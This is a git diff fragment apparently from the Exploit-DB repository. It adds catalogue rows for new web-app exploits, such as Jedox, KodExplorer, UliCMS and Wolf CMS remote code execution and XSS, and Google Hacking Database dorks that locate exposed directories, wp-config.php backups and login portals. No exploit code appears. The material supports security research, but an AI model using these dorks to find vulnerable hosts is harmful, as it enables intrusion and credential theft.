+51426,exploits/php/webapps/51426.txt,"Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47878,,,,,
+51427,exploits/php/webapps/51427.txt,"Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47876,,,,,
+51425,exploits/php/webapps/51425.txt,"Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47877,,,,,
+51423,exploits/php/webapps/51423.txt,"Jedox 2022.4.2 - Code Execution via RPC Interfaces",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47879,,,,,
+51429,exploits/php/webapps/51429.txt,"Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47880,,,,,
+51424,exploits/php/webapps/51424.txt,"Jedox 2022.4.2 - Remote Code Execution via Directory Traversal",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47875,,,,,
 31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1355;OSVDB-43331,,,,,https://www.securityfocus.com/bid/28221/info
 30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,webapps,php,,2007-10-22,2014-01-05,1,CVE-2007-5706;OSVDB-41869,,,,,https://www.securityfocus.com/bid/26171/info
 45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80,2018-11-02,2018-11-02,0,,"SQL Injection (SQLi)",,,,
@@ -22069,6 +22080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
 23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
 51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
+51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@@ -24668,6 +24680,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
+51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-2246,,,,,
 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 -  SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
 42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
@@ -27645,6 +27658,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,,
 40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip,
 38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz,
+51420,exploits/php/webapps/51420.txt,"pluck v4.7.18 - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info
 35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info
 26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php,,2005-12-06,2013-07-11,1,CVE-2005-4054;OSVDB-21480,,,,,https://www.securityfocus.com/bid/15746/info
@@ -29351,7 +29365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,,
 50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
 50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,,
-51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40032,,,,,
+51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,,
 7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,,
 50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
 50205,exploits/php/webapps/50205.py,"Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
@@ -31028,6 +31042,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,,
 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,,
 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
+51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
+51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,,
 11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,,
 34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info
@@ -32237,6 +32253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php,,2010-11-25,2010-11-25,1,,,,,http://www.exploit-db.comwolfcms_060b.zip,http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
 18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,webapps,php,,2012-02-29,2012-03-16,0,OSVDB-79703;OSVDB-79702,,,,http://www.exploit-db.comwolfcms_075.zip,https://www.vulnerability-lab.com/get_content.php?id=452
 36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80,2015-04-22,2015-04-22,0,OSVDB-120877,,,,http://www.exploit-db.comwolfcms-0.8.2.zip,
+51421,exploits/php/webapps/51421.txt,"Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)",2023-05-05,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",webapps,php,,2012-03-23,2012-03-23,0,OSVDB-80537;OSVDB-80298;CVE-2012-1898;CVE-2012-1897,,,,,http://www.webapp-security.com/2012/03/wolfcms/
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,,2018-04-09,2018-04-11,0,CVE-2018-8814,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80,2018-04-09,2018-04-09,0,CVE-2018-8813,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
diff --git a/ghdb.xml b/ghdb.xml
index 23dd00e2b..eed1c0128 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -38814,6 +38814,36 @@ misconfigured servers.
   <date>2021-11-08</date>
   <author>Sandesh Ajgekar</author>
  </entry>
+ <entry>
+  <id>8179</id>
+  <link>https://www.exploit-db.com/ghdb/8179</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intext:&quot;index of&quot; inurl:json-rpc</shortDescription>
+  <textualDescription># Google Dork: intext:&quot;index of&quot; inurl:json-rpc
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Praharsh Kumar Singh</textualDescription>
+  <query>intext:&quot;index of&quot; inurl:json-rpc</query>
+  <querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:json-rpc</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Praharsh Kumar Singh</author>
+ </entry>
+ <entry>
+  <id>8177</id>
+  <link>https://www.exploit-db.com/ghdb/8177</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intext:&quot;index of&quot; inurl:jwks-rsa</shortDescription>
+  <textualDescription># Google Dork: intext:&quot;index of&quot; inurl:jwks-rsa
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Praharsh Kumar Singh</textualDescription>
+  <query>intext:&quot;index of&quot; inurl:jwks-rsa</query>
+  <querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:jwks-rsa</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Praharsh Kumar Singh</author>
+ </entry>
  <entry>
   <id>8106</id>
   <link>https://www.exploit-db.com/ghdb/8106</link>
@@ -40701,6 +40731,21 @@ Information about user data is obtained
   <date>2022-06-20</date>
   <author>Suman Das</author>
  </entry>
+ <entry>
+  <id>8175</id>
+  <link>https://www.exploit-db.com/ghdb/8175</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of &quot;phpunit.yml&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of &quot;phpunit.yml&quot;
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Suman Das</textualDescription>
+  <query>intitle:&quot;index of &quot;phpunit.yml&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;phpunit.yml&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Suman Das</author>
+ </entry>
  <entry>
   <id>6284</id>
   <link>https://www.exploit-db.com/ghdb/6284</link>
@@ -43502,6 +43547,21 @@ the &quot;dovecot.crt.cache&quot; files.
   <date>2020-04-30</date>
   <author>Alexandros Pappas</author>
  </entry>
+ <entry>
+  <id>8178</id>
+  <link>https://www.exploit-db.com/ghdb/8178</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;download.php?file=&quot;
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Praharsh Kumar Singh</textualDescription>
+  <query>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;download.php?file=&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Praharsh Kumar Singh</author>
+ </entry>
  <entry>
   <id>7748</id>
   <link>https://www.exploit-db.com/ghdb/7748</link>
@@ -50138,6 +50198,36 @@ used quite often, usually hidden from google with robots.txt. Author: easypwn</t
   <date>2019-12-12</date>
   <author>Aamir Rehman</author>
  </entry>
+ <entry>
+  <id>8180</id>
+  <link>https://www.exploit-db.com/ghdb/8180</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Andrew Gimenez</textualDescription>
+  <query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Andrew Gimenez</author>
+ </entry>
+ <entry>
+  <id>8181</id>
+  <link>https://www.exploit-db.com/ghdb/8181</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php
+# Files Containing Juicy Info
+# Date:05/05/2023
+# Exploit Author: Andrew Gimenez</textualDescription>
+  <query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</query>
+  <querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>Andrew Gimenez</author>
+ </entry>
  <entry>
   <id>4561</id>
   <link>https://www.exploit-db.com/ghdb/4561</link>
@@ -68678,6 +68768,21 @@ Author: Sibi Mathew George
   <date>2023-02-27</date>
   <author>GirlsLearnCyber</author>
  </entry>
+ <entry>
+  <id>8176</id>
+  <link>https://www.exploit-db.com/ghdb/8176</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>allintitle:&quot;Opengear Management Console&quot;</shortDescription>
+  <textualDescription># Google Dork: allintitle:&quot;Opengear Management Console&quot;
+# Pages Containing Login Portals
+# Date:05/05/2023
+# Exploit Author: GirlsLearnCyber</textualDescription>
+  <query>allintitle:&quot;Opengear Management Console&quot;</query>
+  <querystring>https://www.google.com/search?q=allintitle:&quot;Opengear Management Console&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-05</date>
+  <author>GirlsLearnCyber</author>
+ </entry>
  <entry>
   <id>8127</id>
   <link>https://www.exploit-db.com/ghdb/8127</link>